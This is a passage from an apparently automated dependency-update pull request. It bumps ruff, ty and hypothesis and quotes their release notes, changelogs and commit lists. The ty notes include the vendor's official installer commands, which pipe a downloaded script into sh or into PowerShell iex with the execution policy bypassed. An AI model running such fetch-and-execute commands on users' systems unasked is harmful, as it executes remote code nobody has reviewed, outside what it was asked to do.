href=\"https://github.com/MichaReiser\"\u003e\u003ccode\u003e@​MichaReiser\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/loganrosen\"\u003e\u003ccode\u003e@​loganrosen\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/RafaelJohn9\"\u003e\u003ccode\u003e@​RafaelJohn9\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/adityasingh2400\"\u003e\u003ccode\u003e@​adityasingh2400\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/astral-sh/ruff/blob/main/CHANGELOG.md\"\u003eruff's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.15.16\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-04.\u003c/p\u003e\n\u003ch3\u003ePreview features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-async\u003c/code\u003e] Implement \u003ccode\u003eyield-in-context-manager-in-async-generator\u003c/code\u003e (\u003ccode\u003eASYNC119\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/24644\"\u003e#24644\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epylint\u003c/code\u003e] Narrow diagnostic range and exclude cases without exception handlers (\u003ccode\u003ePLW0717\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25440\"\u003e#25440\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eruff\u003c/code\u003e] Treat \u003ccode\u003eyield\u003c/code\u003e before \u003ccode\u003ebreak\u003c/code\u003e from a terminal loop as terminal (\u003ccode\u003eRUF075\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25447\"\u003e#25447\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003eeradicate\u003c/code\u003e] Avoid flagging \u003ccode\u003eruff:ignore\u003c/code\u003e comments as code (\u003ccode\u003eERA001\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25537\"\u003e#25537\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eeradicate\u003c/code\u003e] Fix \u003ccode\u003eERA001\u003c/code\u003e/\u003ccode\u003eRUF100\u003c/code\u003e conflict when \u003ccode\u003enoqa\u003c/code\u003e is on commented-out code (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25414\"\u003e#25414\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epyflakes\u003c/code\u003e] Avoid removing the \u003ccode\u003eformat\u003c/code\u003e call when it would change behavior (\u003ccode\u003eF523\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25320\"\u003e#25320\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epylint\u003c/code\u003e] Avoid syntax errors in invalid character replacements in f-strings before Python 3.12 (\u003ccode\u003ePLE2510\u003c/code\u003e, \u003ccode\u003ePLE2512\u003c/code\u003e, \u003ccode\u003ePLE2513\u003c/code\u003e, \u003ccode\u003ePLE2514\u003c/code\u003e, \u003ccode\u003ePLE2515\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25544\"\u003e#25544\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epyupgrade\u003c/code\u003e] Avoid converting \u003ccode\u003eformat\u003c/code\u003e calls with more kinds of side effects (\u003ccode\u003eUP032\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25484\"\u003e#25484\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRule changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-pytest-style\u003c/code\u003e] Avoid fixes for ambiguous \u003ccode\u003eargnames\u003c/code\u003e and \u003ccode\u003eargvalues\u003c/code\u003e combinations (\u003ccode\u003ePT006\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/24776\"\u003e#24776\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDrop excess capacity from statement suites during parsing (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25368\"\u003e#25368\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003epydocstyle\u003c/code\u003e] Improve discoverability of rules enabled for each convention (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/24973\"\u003e#24973\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eruff\u003c/code\u003e] Restore example code for Python versions before 3.15 (\u003ccode\u003eRUF017\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25439\"\u003e#25439\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix typo \u003ccode\u003ebin/active\u003c/code\u003e → \u003ccode\u003ebin/activate\u003c/code\u003e in tutorial (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25473\"\u003e#25473\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eShrink additional parser AST collections (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25465\"\u003e#25465\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Redslayer112\"\u003e\u003ccode\u003e@​Redslayer112\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/koriyoshi2041\"\u003e\u003ccode\u003e@​koriyoshi2041\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/George-Ogden\"\u003e\u003ccode\u003e@​George-Ogden\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TejasAmle\"\u003e\u003ccode\u003e@​TejasAmle\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anishgirianish\"\u003e\u003ccode\u003e@​anishgirianish\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ntBre\"\u003e\u003ccode\u003e@​ntBre\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MichaReiser\"\u003e\u003ccode\u003e@​MichaReiser\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/loganrosen\"\u003e\u003ccode\u003e@​loganrosen\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/RafaelJohn9\"\u003e\u003ccode\u003e@​RafaelJohn9\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/adityasingh2400\"\u003e\u003ccode\u003e@​adityasingh2400\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.15.15\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/6c498ab5394edc5622d7f348e12956bf86203716\"\u003e\u003ccode\u003e6c498ab\u003c/code\u003e\u003c/a\u003e Bump 0.15.16 (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25635\"\u003e#25635\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/e51e132831c4e1c4a5ac00fca4c9256354ab99bf\"\u003e\u003ccode\u003ee51e132\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003eflake8-async\u003c/code\u003e] Implement \u003ccode\u003eyield-in-context-manager-in-async-generator\u003c/code\u003e (`AS...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/7c6dcd9f2611999c449143d241c582dedf287964\"\u003e\u003ccode\u003e7c6dcd9\u003c/code\u003e\u003c/a\u003e [ty] Add caching for pattern match narrowing (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25613\"\u003e#25613\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/27058fc071b542bf06395ba89cabed061d313ca6\"\u003e\u003ccode\u003e27058fc\u003c/code\u003e\u003c/a\u003e [ty] Compact retained definition and expression identities (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25606\"\u003e#25606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/bf80d05f007c939799f530c9e775ed9449f5b2eb\"\u003e\u003ccode\u003ebf80d05\u003c/code\u003e\u003c/a\u003e Fix CODEOWNERS syntax (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25622\"\u003e#25622\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/10ccd511e94a81d1e836b174f1c553a73ff3f1b3\"\u003e\u003ccode\u003e10ccd51\u003c/code\u003e\u003c/a\u003e Shrink additional parser AST collections (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25465\"\u003e#25465\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/0d7135f4d23e7f4d8404daed16b9ef11d14f3fb9\"\u003e\u003ccode\u003e0d7135f\u003c/code\u003e\u003c/a\u003e [ty] Upgrade Salsa (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25545\"\u003e#25545\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/49493a3cea83a08fa9aa143695017c816a540f1d\"\u003e\u003ccode\u003e49493a3\u003c/code\u003e\u003c/a\u003e [ty] Show type alias value on hover (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25381\"\u003e#25381\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/85207d3b7657a84252f266766cb0d56034dc21cc\"\u003e\u003ccode\u003e85207d3\u003c/code\u003e\u003c/a\u003e [ty] sys.implementation.version is not sys.version_info (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25608\"\u003e#25608\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/a8a0614348c1fcf47fc9b666eff61a103914d520\"\u003e\u003ccode\u003ea8a0614\u003c/code\u003e\u003c/a\u003e [ty] Avoid retaining duplicate function signatures (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25609\"\u003e#25609\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/astral-sh/ruff/compare/0.15.11...0.15.16\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ty` from 0.0.31 to 0.0.44\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/astral-sh/ty/releases\"\u003ety's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.0.44\u003c/h2\u003e\n\u003ch2\u003eRelease Notes\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-04.\u003c/p\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAvoid treating \u003ccode\u003esys.implementation.version\u003c/code\u003e like \u003ccode\u003esys.version_info\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25608\"\u003e#25608\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix anchor point for override diagnostics (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25621\"\u003e#25621\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eLSP server\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eShow type alias value on hover (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25381\"\u003e#25381\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd caching for pattern match narrowing (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25613\"\u003e#25613\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCompact retained definition and expression identities (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25606\"\u003e#25606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReuse expression cache for TypedDict union inference (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25643\"\u003e#25643\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpgrade Salsa (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25545\"\u003e#25545\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCore type checking\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eEnable narrowing for unions of TypedDict (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25188\"\u003e#25188\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lerebear\"\u003e\u003ccode\u003e@​lerebear\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MichaReiser\"\u003e\u003ccode\u003e@​MichaReiser\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/carljm\"\u003e\u003ccode\u003e@​carljm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pierrem964\"\u003e\u003ccode\u003e@​pierrem964\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/charliermarsh\"\u003e\u003ccode\u003e@​charliermarsh\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Hugo-Polloli\"\u003e\u003ccode\u003e@​Hugo-Polloli\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eInstall ty 0.0.44\u003c/h2\u003e\n\u003ch3\u003eInstall prebuilt binaries via shell script\u003c/h3\u003e\n\u003cpre lang=\"sh\"\u003e\u003ccode\u003ecurl --proto '=https' --tlsv1.2 -LsSf https://releases.astral.sh/github/ty/releases/download/0.0.44/ty-installer.sh | sh\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch3\u003eInstall prebuilt binaries via powershell script\u003c/h3\u003e\n\u003cpre lang=\"sh\"\u003e\u003ccode\u003epowershell -ExecutionPolicy Bypass -c \u0026quot;irm https://releases.astral.sh/github/ty/releases/download/0.0.44/ty-installer.ps1 | iex\u0026quot;\n\u003c/code\u003e\u003c/pre\u003e\n\u003ch2\u003eDownload ty 0.0.44\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/astral-sh/ty/blob/main/CHANGELOG.md\"\u003ety's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.0.44\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-04.\u003c/p\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAvoid treating \u003ccode\u003esys.implementation.version\u003c/code\u003e like \u003ccode\u003esys.version_info\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25608\"\u003e#25608\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix anchor point for override diagnostics (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25621\"\u003e#25621\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eLSP server\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eShow type alias value on hover (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25381\"\u003e#25381\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd caching for pattern match narrowing (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25613\"\u003e#25613\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eCompact retained definition and expression identities (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25606\"\u003e#25606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eReuse expression cache for TypedDict union inference (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25643\"\u003e#25643\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpgrade Salsa (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25545\"\u003e#25545\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCore type checking\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eEnable narrowing for unions of TypedDict (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25188\"\u003e#25188\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lerebear\"\u003e\u003ccode\u003e@​lerebear\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MichaReiser\"\u003e\u003ccode\u003e@​MichaReiser\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/carljm\"\u003e\u003ccode\u003e@​carljm\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pierrem964\"\u003e\u003ccode\u003e@​pierrem964\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/charliermarsh\"\u003e\u003ccode\u003e@​charliermarsh\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Hugo-Polloli\"\u003e\u003ccode\u003e@​Hugo-Polloli\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.0.43\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-03.\u003c/p\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDon't inject \u003ccode\u003eUnknown\u003c/code\u003e from non-callable elements of intersection call (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25538\"\u003e#25538\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDon't needlessly disambiguate the same type alias (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25563\"\u003e#25563\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix variance inference for nested type aliases (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25567\"\u003e#25567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eIgnore rejected member annotations for synthesized bindings (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25427\"\u003e#25427\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNormalize dynamic class literals in cycle recovery (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25558\"\u003e#25558\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRegister file roots for first-party search paths (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25522\"\u003e#25522\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eTreat union-bound typevars like unions for \u003ccode\u003epossibly-missing-attribute\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25561\"\u003e#25561\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eLSP server\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSuppress importable completions that are already in scope (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25479\"\u003e#25479\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/f5523e256eb275c9b473f174aedc383e7b050c34\"\u003e\u003ccode\u003ef5523e2\u003c/code\u003e\u003c/a\u003e Bump version to 0.0.44 (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3667\"\u003e#3667\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/29ce3146faa2d42867dadd7ecbda84759b8183be\"\u003e\u003ccode\u003e29ce314\u003c/code\u003e\u003c/a\u003e Bump version to 0.0.43 (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3648\"\u003e#3648\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/794322d34624abc56301bd85ac354b94ca54fbb2\"\u003e\u003ccode\u003e794322d\u003c/code\u003e\u003c/a\u003e Update docker/build-push-action action to v7.2.0 (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3629\"\u003e#3629\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/ce89685310383494c7dfec92bd2fc2dd2a46d074\"\u003e\u003ccode\u003ece89685\u003c/code\u003e\u003c/a\u003e Update prek dependencies (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3628\"\u003e#3628\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/792fb71ca172f8d67fcfdb5fdd452a049724c8fd\"\u003e\u003ccode\u003e792fb71\u003c/code\u003e\u003c/a\u003e Update docker/login-action action to v4.2.0 (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3630\"\u003e#3630\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/5c377476823a4b77a903fb5340d77b51d68db389\"\u003e\u003ccode\u003e5c37747\u003c/code\u003e\u003c/a\u003e Update docker/metadata-action action to v6.1.0 (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3631\"\u003e#3631\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/5a3e1695ce1e2205070afc18d9a7449e0ed045d0\"\u003e\u003ccode\u003e5a3e169\u003c/code\u003e\u003c/a\u003e Update docker/setup-buildx-action action to v4.1.0 (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3632\"\u003e#3632\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/c2500cc57e4aea85ae8e3287351538ad60a9ee00\"\u003e\u003ccode\u003ec2500cc\u003c/code\u003e\u003c/a\u003e Release: Force usage of PyPI as the index (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3616\"\u003e#3616\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/7f8cb6457e8d77178ae9204f9b81a516f44444ed\"\u003e\u003ccode\u003e7f8cb64\u003c/code\u003e\u003c/a\u003e Bump version to 0.0.42 (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3615\"\u003e#3615\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ty/commit/41bb0d24412ad97c214bd0019e602c463ae3feba\"\u003e\u003ccode\u003e41bb0d2\u003c/code\u003e\u003c/a\u003e Bump version to 0.0.41 (\u003ca href=\"https://redirect.github.com/astral-sh/ty/issues/3601\"\u003e#3601\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/astral-sh/ty/compare/0.0.31...0.0.44\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `hypothesis` from 6.152.1 to 6.155.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/HypothesisWorks/hypothesis/releases\"\u003ehypothesis's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eHypothesis for Python - version 6.152.9\u003c/h2\u003e\n\u003cp\u003eThis release substantially improves our internal distribution for\ngenerating integers. This release has the most visible effect on\n\u0026quot;integers()\u0026quot;, but may incidentally improve other strategies which draw\nintegers internally.\u003c/p\u003e\n\u003cp\u003eOur integers distribution had two problems. First, it had jagged\ndiscontinuities at certain values where we switched sampling\napproaches. Second, it used a different distribution for bounded and\nunbounded ranges, which resulted in \u0026quot;st.integers()\u0026quot; and\n\u0026quot;st.integers(-2\u003cstrong\u003e64, 2\u003c/strong\u003e64)\u0026quot; producing very different distributions\ndespite being semantically similar.\u003c/p\u003e\n\u003cp\u003eWe now use a smooth distribution for both \u0026quot;st.integers()\u0026quot; and\n\u0026quot;st.integers(a, b)\u0026quot;, which fixes both of these issues. This should\nsubstantially improve our testing power in certain cases.\u003c/p\u003e\n\u003cp\u003eThe only way this release should be user-visible is that it finds more\nbugs! If this release is user-visible in other ways - for example,\nbecause it is slower, or produces a worse distribution in some cases -\nplease open an issue.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003e\u003ca href=\"https://hypothesis.readthedocs.io/en/latest/changelog.html#v6-152-9\"\u003eThe canonical version of these notes (with links) is on readthedocs.\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003ch2\u003eHypothesis for Python - version 6.152.8\u003c/h2\u003e\n\u003cp\u003eThis release drops support for end-of-life Django 4.2.\u003c/p\u003e\n\u003cp\u003e\u003cem\u003e\u003ca href=\"https://hypothesis.readthedocs.io/en/latest/changelog.html#v6-152-8\"\u003eThe canonical version of these notes (with links) is on readthedocs.\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003ch2\u003eHypothesis for Python - version 6.152.7\u003c/h2\u003e\n\u003cp\u003eThis patch improves our type hints for \u0026quot;.filter()\u0026quot; to work with\n\u0026quot;typing.TypeGuard\u0026quot;. For example:\u003c/p\u003e\n\u003cp\u003efrom typing import TypeGuard\u003c/p\u003e\n\u003cp\u003efrom hypothesis import strategies as st\u003c/p\u003e\n\u003cp\u003edef is_str(x: object) -\u0026gt; TypeGuard[str]:\nreturn isinstance(x, str)\u003c/p\u003e\n\u003cp\u003es = st.from_type(object).filter(is_str)\u003c/p\u003e\n\u003ch1\u003epreviously: SearchStrategy[object]\u003c/h1\u003e\n\u003ch1\u003enow: SearchStrategy[str]\u003c/h1\u003e\n\u003cp\u003ereveal_type(s)\u003c/p\u003e\n\u003cp\u003e\u003cem\u003e\u003ca href=\"https://hypothesis.readthedocs.io/en/latest/changelog.html#v6-152-7\"\u003eThe canonical version of these notes (with links) is on readthedocs.\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003ch2\u003eHypothesis for Python - version 6.152.6\u003c/h2\u003e\n\u003cp\u003eThis patch adds a shrinking pass that tries natural text\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... 